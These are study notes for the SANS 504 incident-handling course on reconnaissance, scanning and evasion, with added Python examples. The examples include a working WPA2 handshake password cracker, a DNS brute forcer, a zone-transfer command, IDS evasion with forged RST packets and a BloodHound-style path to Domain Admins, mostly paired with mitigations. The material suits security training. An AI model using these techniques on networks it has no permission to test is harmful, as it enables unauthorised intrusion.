SANS 504.2
To create an effective defense, we must understand the offensive tools attackers use. That's what this book is all about.
Attack Trends
💡 The first rule: always get permission, and it needs to be in writing.
Most new IoT devices lack security, because vendors compete on price and development cycles are short.
Industry experts expect 5.7 billion IoT devices by 2025.
A CrowdStrike report indicates that nation-state attackers are getting faster, reducing breakout time (the time from initial compromise to lateral movement onto other systems):
Russia: 20 min, North Korea: 140 min, China: 240 min, Iran: 309 min
This means you may have only about 3.5 hours to respond to an initial compromise of your network, and against the fastest actors far less.
The bottom line here is that we live in the golden age of hacking, but it is also the golden age of information security. The two go hand in hand.
Reconnaissance
SANS 504.2 1
The internet is a treasure trove of information for a curious attacker.
Before you send your first packet to a target, you should collect OSINT data.
OSINT is used both offensively and defensively, as we will see in this module.
Some OSINT techniques:
whois: collect information about the registrant (contact details, name servers, registration dates)
whois history: historical registration records for the target, but the providers charge about $1 per lookup 😟
Reverse whois: find other domains registered with the same registrant details
Certificate data: gather information about targets, including which CAs they use; certificates also list the hostnames they were issued for
Have I Been Pwned: check whether the target's email addresses appear in known breach dumps
SpiderFoot: provide a domain name, hostname or email address as a seed and it automates the rest of the collection
OSINT is great for attackers because it touches none of the target's systems and therefore generates no logs there.
Only after OSINT do attackers move on to active scanning.
DNS Interrogation
The attacker's goal is to discover as many IP addresses associated with the target domain as possible.
The nslookup command can be used to interact with a DNS server to get this data.
dig is another useful tool for DNS recon and does the same job on UNIX/Linux:
dig @<dns-server> target.com ANY
dig @<dns-server> target.com AXFR   (zone transfer: dumps the whole zone if the server allows it)
You can also brute-force hostnames: resolve a wordlist of likely names (www, mail, vpn, dev, ...) under the target domain and note which ones exist.
To mitigate this type of attack, don't allow zone transfers to just any system (restrict AXFR to your own secondary servers), use split DNS so the internet-facing server only knows public names, and make sure your DNS servers are hardened.
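The hostname brute force mentioned above, as an added example (not course material). The resolver is passed in as a function so the script runs offline against a constructed zone; the wildcard check matters in practice because a zone with a *.target.com record answers every guess and would otherwise report every word as a hit. All names and addresses are made up.

```python
"""Wildcard-aware DNS hostname brute force.

Added example, not course material. The resolver is injectable: the constructed
FAKE_ZONE below stands in for the target's authoritative DNS so this runs offline;
pass real_resolver to query live servers.
"""
import secrets
import socket

# Constructed zone. The "*" entry models a wildcard record, which answers every
# name and would turn a naive brute force into a list of false positives.
FAKE_ZONE = {
    "www.example.test": "203.0.113.10",
    "mail.example.test": "203.0.113.25",
    "vpn.example.test": "198.51.100.7",
    "dev.example.test": "203.0.113.10",
    "*.example.test": "203.0.113.99",
}


def fake_resolver(name):
    """Return an address for `name` or None, honouring the wildcard like a real zone."""
    if name in FAKE_ZONE:
        return FAKE_ZONE[name]
    parent = name.split(".", 1)[1]
    return FAKE_ZONE.get("*." + parent)


def real_resolver(name):
    """Resolver for live use; None on NXDOMAIN or timeout (gaierror is an OSError)."""
    try:
        return socket.gethostbyname(name)
    except OSError:
        return None


def detect_wildcard(domain, resolve, probes=3):
    """Resolve random labels nobody would register. If they answer, the zone has a
    wildcard; return the set of addresses it answers with so hits can be filtered."""
    answers = set()
    for _ in range(probes):
        ip = resolve(f"{secrets.token_hex(8)}.{domain}")
        if ip:
            answers.add(ip)
    return answers


def brute_force(domain, wordlist, resolve=fake_resolver):
    """Return {hostname: address} for names that exist, excluding wildcard answers."""
    wildcard_ips = detect_wildcard(domain, resolve)
    found = {}
    for word in wordlist:
        host = f"{word}.{domain}"
        ip = resolve(host)
        if ip and ip not in wildcard_ips:
            found[host] = ip
    return found


if __name__ == "__main__":
    words = ["www", "mail", "vpn", "dev", "test", "intranet", "citrix"]
    for host, ip in sorted(brute_force("example.test", words).items()):
        print(f"{host:22} {ip}")
```

Caveat: filtering by the wildcard's address also hides any real host that happens to share that address; when a zone is wildcarded, compare other record types (CNAME, MX) before discarding a name.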
Website Searches
You should check press releases, white papers, design documents, contact pages, etc.
Check public databases, job sites and hacker sites.
Pushpin is a social media geolocation tool that uses Flickr and Google photo metadata:
it pulls all available geotagged social media posts from a given area
and can map targets to behavior patterns.
Search Engines
The easiest way to get information is to ask for it. Ask whom?
Google, Bing, Baidu, Yahoo and Shodan.
There is also the GHDB (Google Hacking Database).
He talked about some Google dorks.
Waybackurls pulls the historical URLs the Wayback Machine has archived for a domain.
Many files (.doc, .xls, .pdf, .jpeg) carry metadata that can be useful to attackers, like
usernames, directory paths and vulnerable software versions.
Extracting the metadata manually is a painful process; luckily for us FOCA automates it.
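What FOCA-style metadata extraction actually pulls out of an Office document, as an added example (not course material and not FOCA's code). A .docx is a zip archive; the author and last editor live in docProps/core.xml, the application and version in docProps/app.xml, and an attached-template relationship in word/_rels/settings.xml.rels can leak a local path with a username in it. The document below is constructed in memory with made-up names so the script runs offline; point extract_docx_metadata() at the bytes of a real file to use it.

```python
"""Extract attacker-useful metadata from an Office Open XML (.docx) file.

Added example, not course material and not FOCA's code. The sample document is
constructed in-script (all names are fictional) so this runs offline.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
    "ep": "http://schemas.openxmlformats.org/officeDocument/2006/extended-properties",
}

CORE_XML = """<?xml version="1.0" encoding="UTF-8"?>
<cp:coreProperties xmlns:cp="{cp}" xmlns:dc="{dc}">
  <dc:creator>jsmith</dc:creator>
  <cp:lastModifiedBy>CORP\\a.nguyen</cp:lastModifiedBy>
</cp:coreProperties>""".format(**NS)

APP_XML = """<?xml version="1.0" encoding="UTF-8"?>
<Properties xmlns="{ep}">
  <Application>Microsoft Office Word</Application>
  <AppVersion>14.0000</AppVersion>
  <Company>Example Corp</Company>
</Properties>""".format(**NS)

# Attached-template relationship: leaks a local directory path and a username.
SETTINGS_RELS = """<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" TargetMode="External"
    Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
    Target="file:///C:\\Users\\jsmith\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm"/>
</Relationships>"""


def build_sample_docx():
    """Constructed .docx (zip) containing only the metadata parts we care about."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("docProps/core.xml", CORE_XML)
        z.writestr("docProps/app.xml", APP_XML)
        z.writestr("word/_rels/settings.xml.rels", SETTINGS_RELS)
    return buf.getvalue()


def _text(root, path):
    el = root.find(path, NS)
    return el.text if el is not None else None


def extract_docx_metadata(data):
    """Return {'users': set, 'paths': set, 'software': str|None} from .docx bytes."""
    meta = {"users": set(), "paths": set(), "software": None}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = set(z.namelist())
        if "docProps/core.xml" in names:
            core = ET.fromstring(z.read("docProps/core.xml"))
            for prop in ("dc:creator", "cp:lastModifiedBy"):
                value = _text(core, prop)
                if value:
                    meta["users"].add(value)
        if "docProps/app.xml" in names:
            app = ET.fromstring(z.read("docProps/app.xml"))
            meta["software"] = f"{_text(app, 'ep:Application')} {_text(app, 'ep:AppVersion')}"
        # Any relationship part may point at a local file; harvest path and username.
        for name in names:
            if name.endswith(".rels"):
                for target in re.findall(r'Target="(file:///[^"]+)"', z.read(name).decode()):
                    meta["paths"].add(target)
                    m = re.search(r"Users[\\/]([^\\/]+)", target)
                    if m:
                        meta["users"].add(m.group(1))
    return meta


if __name__ == "__main__":
    for key, value in extract_docx_metadata(build_sample_docx()).items():
        print(f"{key:9} {value}")
```

The same three sources (creator/lastModifiedBy, Application/AppVersion, external relationship targets) exist in .xlsx and .pptx packages, so the function works on those too; the AppVersion string is what tells an attacker which Office build to target.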
Recon-ng, by Tim Tomes, is another powerful recon framework.
Bishop Fox's SearchDiggity is a fantastic suite that includes Google Diggity.
Maltego is an intelligence-gathering tool that searches through various public information sources
and gathers information about relationships between people, social networks, companies, etc.
Numerous websites offer the capability to research or even attack other sites:
Shodan
tools.dnsstuff.com
www.network-tools.com
www.securityspace.com
Shodan is an online service that crawls the internet in much the same way Google crawls web pages, but it records open ports and service banners rather than page content.
Scanning
War Dialing
War dialing is an old technique, but still amazingly successful: dial through ranges of phone numbers looking for modems and voicemail systems to attack.
HD Moore released a tool called WarVOX that focuses on conducting war-dialing assessments of target telephone number ranges.
War Driving
The identification of wireless networks is known as war driving.
WiFi networks are an attractive target for attackers.
Some tools we use for scanning WiFi:
inSSIDer, from MetaGeek, uses active and passive scanning with a standard WiFi card on Windows. It identifies SSIDs and channel information and integrates with a GPS for location mapping.
WiFi Analyzer
WiFi Analyzer gathers similar data, but on Android devices.
Kismet captures WiFi activity and provides detailed information about networks and clients as they are seen. It is completely passive.
PSK-based WiFi authentication is simple and inexpensive to deploy, but it is susceptible to offline password guessing: the pairwise master key is derived only from the passphrase and the SSID, so anyone who captures one client's four-way handshake can test guesses without sending another frame to the network.
After capturing a handshake with Kismet, we can use Aircrack-ng to crack the password with a wordlist.
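Why the guessing works offline, as an added example (not course material and not aircrack-ng's code). The capture normally comes from Kismet or airodump-ng; here a handshake is constructed in-script with fictional MAC addresses, nonces and SSID so the check runs without a WiFi card. The derivation itself (PBKDF2 for the PMK, the 802.11 PRF for the PTK, HMAC-SHA1 for the WPA2 MIC) follows the standard, which is why one captured MIC lets an attacker verify every guess locally.

```python
"""WPA2-PSK offline guessing: what aircrack-ng does with a captured handshake.

Added example, not course material. Everything needed is in one four-way
handshake: SSID, both MAC addresses, both nonces and the MIC on message 2.
The handshake here is constructed in-script rather than captured.
"""
import hashlib
import hmac


def pmk(passphrase, ssid):
    """802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key, label, data):
    """802.11 PRF-512: concatenate HMAC-SHA1(key, label || 0x00 || data || i), i = 0..3."""
    out = b""
    for i in range(4):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def ptk(pmk_bytes, ap_mac, sta_mac, anonce, snonce):
    """Pairwise transient key; the first 16 bytes are the KCK that signs EAPOL frames."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk_bytes, b"Pairwise key expansion", data)


def eapol_mic(kck, eapol_frame_mic_zeroed):
    """WPA2 (key descriptor version 2): HMAC-SHA1 over the frame, truncated to 16 bytes."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def crack(handshake, wordlist):
    """Return the passphrase whose derived KCK reproduces the captured MIC, else None.
    No network traffic is involved: every guess is checked against the capture alone."""
    for guess in wordlist:
        kck = ptk(pmk(guess, handshake["ssid"]), handshake["ap_mac"], handshake["sta_mac"],
                  handshake["anonce"], handshake["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, handshake["eapol"]), handshake["mic"]):
            return guess
    return None


def constructed_handshake(passphrase="sunshine2019"):
    """Fabricate a capture whose MIC is consistent with `passphrase` (test fixture only)."""
    hs = {
        "ssid": "CorpGuest",
        "ap_mac": bytes.fromhex("001122334455"),
        "sta_mac": bytes.fromhex("66778899aabb"),
        "anonce": bytes(range(32)),
        "snonce": bytes(range(32, 64)),
        # Stand-in for EAPOL-Key message 2 with its MIC field already zeroed;
        # constructed bytes, not a real frame layout.
        "eapol": bytes.fromhex("0103007502010a00000000000000000001") + bytes(96),
    }
    kck = ptk(pmk(passphrase, hs["ssid"]), hs["ap_mac"], hs["sta_mac"],
              hs["anonce"], hs["snonce"])[:16]
    hs["mic"] = eapol_mic(kck, hs["eapol"])
    return hs


if __name__ == "__main__":
    wordlist = ["password", "letmein", "sunshine2019", "qwerty"]
    print("recovered:", crack(constructed_handshake(), wordlist))
```

The cost per guess is the 4096-iteration PBKDF2, which is why the attack is a wordlist race: a long random passphrase is out of reach, a dictionary word is not. This is also the property WPA2-Enterprise removes, since there is no shared passphrase to recover.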
It is possible to impersonate open APs without special hardware; ILMN is a Linux virtual machine for impersonating an AP.
Non-WiFi attacks are less common, but no less damaging to your organization.
Beyond WiFi there are many other wireless weaknesses:
insecure protocols
Bluetooth
automation controls over ZigBee
automation systems over Z-Wave
vulnerable RFID systems for door locks
PSK is not appropriate for enterprise networks: deploy WPA2-Enterprise (802.1X authentication) with a plan to move to WPA3.
To identify wireless intruders, look for the appearance of rogue access points or strange messages sent by intruding wireless clients.
Also, for detecting rogue access points, Cisco offers built-in capabilities in existing access points to detect unregistered access points that appear in your environment.
These tools are also widely used by law enforcement to identify criminals using WiFi access points.
Nmap is an essential tool for attackers and defenders alike!
Nmap sends four packets to identify hosts that are up:
ICMP Echo request
TCP SYN to port 443
TCP ACK to port 80
ICMP Timestamp request
Once Nmap finishes its network sweep and traceroute activities, the Zenmap GUI can provide an interactive graphical portrayal of the network.
To avoid being mapped by ping sweeps, he recommended blocking ICMP Echo requests at the perimeter, but then your users couldn't ping you either.
Alternatively, if you notice a particularly frequent ping sweep, you could temporarily block the source address.
The SYN scan is the stealthiest because it never completes the three-way handshake, and most systems don't log incomplete connections.
ACK scans are useful for mapping firewall rules (filtered vs. unfiltered ports) but not for telling whether a port is open. They are useful for finding sensitive internal systems post-exploitation.
Nmap OS fingerprinting uses more than 30 different tests.
Traditional port scanning with Nmap can be slow, because it keeps state for every outstanding probe.
Masscan separates SYN transmission from SYN/ACK reception and keeps no per-probe state, which makes it far faster than Nmap.
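How a scanner can separate sending from receiving without a probe table, as an added example (not course material and not masscan's code). The trick, which masscan calls a SYN cookie, is to make the TCP sequence number of each SYN a keyed hash of the target and port; any SYN/ACK can then be validated from its acknowledgement number alone. The network here is a constructed stand-in that answers like a TCP stack, with made-up addresses, so the logic runs offline and without raw sockets.

```python
"""Stateless SYN scanning: the design behind masscan's speed.

Added example, not course material or masscan code. The transmit side emits a
SYN whose sequence number is an HMAC of (target, port); the receive side checks
ack == cookie + 1 on any segment that arrives. Neither side keeps a table.
"""
import hashlib
import hmac
import ipaddress
import secrets
import struct

SYN, RST, ACK = 0x02, 0x04, 0x10


class StatelessScanner:
    def __init__(self, secret=None):
        # Per-run secret so a target cannot forge replies that look like ours.
        self.secret = secret or secrets.token_bytes(16)

    def syn_cookie(self, dst_ip, dst_port, src_port):
        """Sequence number to send in the SYN for this (target, port, our port)."""
        msg = ipaddress.ip_address(dst_ip).packed + struct.pack("!HH", dst_port, src_port)
        return struct.unpack("!I", hmac.new(self.secret, msg, hashlib.sha256).digest()[:4])[0]

    def build_syn(self, dst_ip, dst_port, src_port=40000):
        """Transmit side: emit a SYN and forget it."""
        return {"dst_ip": dst_ip, "dst_port": dst_port, "src_port": src_port,
                "seq": self.syn_cookie(dst_ip, dst_port, src_port), "flags": SYN}

    def classify_reply(self, pkt):
        """Receive side: 'open', 'closed' or None (not ours / forged), from the segment alone."""
        expected = (self.syn_cookie(pkt["src_ip"], pkt["src_port"], pkt["dst_port"]) + 1) & 0xFFFFFFFF
        if pkt["ack"] != expected:
            return None                       # never answered one of our probes
        if pkt["flags"] & SYN and pkt["flags"] & ACK:
            return "open"                     # SYN/ACK
        if pkt["flags"] & RST:
            return "closed"                   # RST/ACK
        return None


def simulated_target(syn, open_ports):
    """Constructed stand-in for the network: answers like a real TCP stack would."""
    flags = SYN | ACK if syn["dst_port"] in open_ports else RST | ACK
    return {"src_ip": syn["dst_ip"], "src_port": syn["dst_port"], "dst_port": syn["src_port"],
            "ack": (syn["seq"] + 1) & 0xFFFFFFFF, "flags": flags}


def run_scan(ports, open_ports=(22, 443), target="198.51.100.20"):
    """Scan `ports` on the simulated target; returns {port: state} for validated replies."""
    scanner = StatelessScanner()
    replies = [simulated_target(scanner.build_syn(target, p), open_ports) for p in ports]
    # A forged SYN/ACK for a port we never probed: its ack cannot match any cookie.
    replies.append({"src_ip": target, "src_port": 8080, "dst_port": 40000,
                    "ack": 12345, "flags": SYN | ACK})
    results = {}
    for reply in replies:
        state = scanner.classify_reply(reply)
        if state:
            results[reply["src_port"]] = state
    return results


if __name__ == "__main__":
    print(run_scan([22, 80, 443, 3389]))
```

Because nothing is remembered between send and receive, the two halves can run on separate threads at line rate; the price is that retransmission and timing adaptation, which Nmap gets from its state table, have to be added on top.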
EyeWitness takes screenshots of websites and of VNC and RDP services, so large scan results can be triaged visually.
Evading IPS, IDS
Many IDS/IPS systems do not validate the TCP checksum. The end host discards a segment with a bad checksum, but such a sensor processes it anyway, so an attacker can insert a TCP RST with an invalid checksum: the IDS/IPS tears down its view of the session and clears its reassembly buffer, while the real connection continues untouched.
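The forged-RST evasion and the check that defeats it, as an added example (not course material, not any real IDS engine). The segments are constructed in-script with private addresses. A minimal stream tracker is run twice over the same three packets: data, a RST with a deliberately bad checksum, then the rest of the data. Without checksum validation the RST empties the buffer and the signature "GET /admin/" is never seen whole; with validation the RST is dropped exactly as the end host would drop it.

```python
"""TCP checksum validation as an IDS evasion countermeasure.

Added example, not course material. Packets are constructed in-script.
"""
import struct

FIN, SYN, RST, PSH, ACK = 0x01, 0x02, 0x04, 0x08, 0x10


def checksum(data):
    """RFC 1071 ones'-complement sum over 16-bit words (odd length is zero-padded)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def tcp_checksum(src_ip, dst_ip, tcp_segment):
    """Checksum over the IPv4 pseudo-header (src, dst, zero, proto 6, length) + segment."""
    pseudo = src_ip + dst_ip + struct.pack("!BBH", 0, 6, len(tcp_segment))
    return checksum(pseudo + tcp_segment)


def build_tcp(src_ip, dst_ip, sport, dport, seq, ack, flags, payload=b"", corrupt=False):
    """20-byte TCP header + payload; `corrupt=True` deliberately breaks the checksum."""
    hdr = struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4, flags, 65535, 0, 0)
    csum = tcp_checksum(src_ip, dst_ip, hdr + payload)
    if corrupt:
        csum ^= 0x1234
    return hdr[:16] + struct.pack("!H", csum) + hdr[18:] + payload


def checksum_ok(src_ip, dst_ip, seg):
    """True when the checksum carried in the header matches a recomputation."""
    stored = struct.unpack("!H", seg[16:18])[0]
    return tcp_checksum(src_ip, dst_ip, seg[:16] + b"\x00\x00" + seg[18:]) == stored


def parse_tcp(seg):
    sport, dport, seq, ack, off, flags, _win, _csum, _urg = struct.unpack("!HHIIBBHHH", seg[:20])
    return {"sport": sport, "dport": dport, "seq": seq, "ack": ack,
            "flags": flags, "payload": seg[(off >> 4) * 4:]}


class StreamTracker:
    """Minimal per-flow reassembly; `verify_checksum` toggles the hardening."""

    def __init__(self, verify_checksum):
        self.verify = verify_checksum
        self.flows = {}              # (src, dst, sport, dport) -> reassembled bytes
        self.dropped_bad_csum = 0

    def process(self, src_ip, dst_ip, seg):
        if self.verify and not checksum_ok(src_ip, dst_ip, seg):
            self.dropped_bad_csum += 1   # the end host would drop it too
            return
        p = parse_tcp(seg)
        key = (src_ip, dst_ip, p["sport"], p["dport"])
        if p["flags"] & RST:
            self.flows.pop(key, None)    # session torn down, buffer discarded
            return
        self.flows[key] = self.flows.get(key, b"") + p["payload"]


def reassembled(verify_checksum):
    """Replay data, forged bad-checksum RST, more data; return what the sensor holds."""
    a, b = bytes([10, 0, 0, 5]), bytes([10, 0, 0, 80])
    t = StreamTracker(verify_checksum)
    t.process(a, b, build_tcp(a, b, 50000, 80, 1000, 1, ACK | PSH, b"GET /adm"))
    t.process(a, b, build_tcp(a, b, 50000, 80, 1008, 1, RST, corrupt=True))
    t.process(a, b, build_tcp(a, b, 50000, 80, 1008, 1, ACK | PSH, b"in/ HTTP/1.0\r\n"))
    return t.flows.get((a, b, 50000, 80), b"")


if __name__ == "__main__":
    print("naive sensor   :", reassembled(verify_checksum=False))
    print("hardened sensor:", reassembled(verify_checksum=True))
```

A RST with a valid checksum is legitimate and must still tear the flow down; the hardening is only to refuse segments the endpoint itself will never act on.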
Many attackers today abuse services and protocols your environment uses every day: SSH, RDP, Citrix, OWA.
Attackers will use an exploit/payload combination for the initial attack, but will switch to stolen user credentials as soon as possible.
Some mitigations for evasion:
Keep your IDS and IPS (engine and signatures) up to date
For sensitive systems, use host-based IDS/IPS in addition to network-based IDS and IPS
Implement user behavioral analytics
Vulnerability Scanners
Many commercial and open-source scanners:
Rapid7 (Nexpose/InsightVM)
SAINT
BeyondTrust
Nessus
OpenVAS
He talked about Nessus, the most popular one ("check the room on TryHackMe").
SMB sessions
SMB is an application-layer protocol that implements file and printer sharing, domain authentication, remote administration and other features.
SMB is heavily used by attackers, often blending in as "normal" TCP/445 traffic. It is an essential protocol for defenders to understand.
Establishing an SMB session from Windows:
SMB password guessing:
BloodHound
A tool that graphs the quickest way to get domain administrator privileges. For example:
Gain access as a domain user.
Find all systems.
Find one of those systems where a domain administrator is logged on.
Steal the domain administrator's access.
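The path search BloodHound performs, reduced to its essentials as an added example (not course material and not BloodHound's code). The directory is a small constructed graph with fictional principals; edge names follow BloodHound's vocabulary (MemberOf, AdminTo, HasSession). A breadth-first search from the compromised user gives the fewest-hop route to Domain Admins, and the reverse walk gives the defender's view: every principal from which that route exists.

```python
"""Shortest attack path to Domain Admins over an AD-style graph.

Added example of the idea BloodHound implements; not BloodHound code.
Edges: MemberOf (principal -> group), AdminTo (principal -> computer),
HasSession (computer -> user whose credentials are exposed there).
"""
from collections import deque

# Constructed environment; all names are fictional.
EDGES = [
    ("alice@CORP", "MemberOf", "HELPDESK@CORP"),
    ("HELPDESK@CORP", "AdminTo", "WS01.CORP"),
    ("HELPDESK@CORP", "AdminTo", "WS07.CORP"),
    ("WS07.CORP", "HasSession", "bob@CORP"),
    ("bob@CORP", "MemberOf", "SERVER-OPS@CORP"),
    ("SERVER-OPS@CORP", "AdminTo", "SRV-FILE01.CORP"),
    ("SRV-FILE01.CORP", "HasSession", "da_admin@CORP"),
    ("da_admin@CORP", "MemberOf", "DOMAIN ADMINS@CORP"),
    ("carol@CORP", "MemberOf", "DOMAIN USERS@CORP"),
]

DOMAIN_ADMINS = "DOMAIN ADMINS@CORP"


def build_graph(edges):
    graph = {}
    for src, rel, dst in edges:
        graph.setdefault(src, []).append((rel, dst))
        graph.setdefault(dst, [])
    return graph


def shortest_path(graph, start, target):
    """BFS: list of (src, relationship, dst) steps with the fewest hops, or None."""
    parent = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == target:
            steps = []
            while parent[node] is not None:
                prev, rel = parent[node]
                steps.append((prev, rel, node))
                node = prev
            return steps[::-1]
        for rel, nxt in graph.get(node, []):
            if nxt not in parent:
                parent[nxt] = (node, rel)
                queue.append(nxt)
    return None


def who_reaches(graph, target):
    """Defender's view: every node with some path to `target` (reverse reachability)."""
    reverse = {}
    for src, outs in graph.items():
        for _, dst in outs:
            reverse.setdefault(dst, []).append(src)
    seen, stack = set(), [target]
    while stack:
        node = stack.pop()
        for prev in reverse.get(node, []):
            if prev not in seen:
                seen.add(prev)
                stack.append(prev)
    return seen


def describe(steps):
    return [f"{src} -{rel}-> {dst}" for src, rel, dst in steps]


if __name__ == "__main__":
    g = build_graph(EDGES)
    for line in describe(shortest_path(g, "alice@CORP", DOMAIN_ADMINS)):
        print(line)
    print("can reach DA:", sorted(who_reaches(g, DOMAIN_ADMINS)))
```

Each HasSession hop in the output is a place where a credential theft tool would be run on the computer, and each AdminTo hop is where it could be run; the defender's fix is to break the cheapest edge on the path, typically by keeping domain admins from logging on to workstations at all.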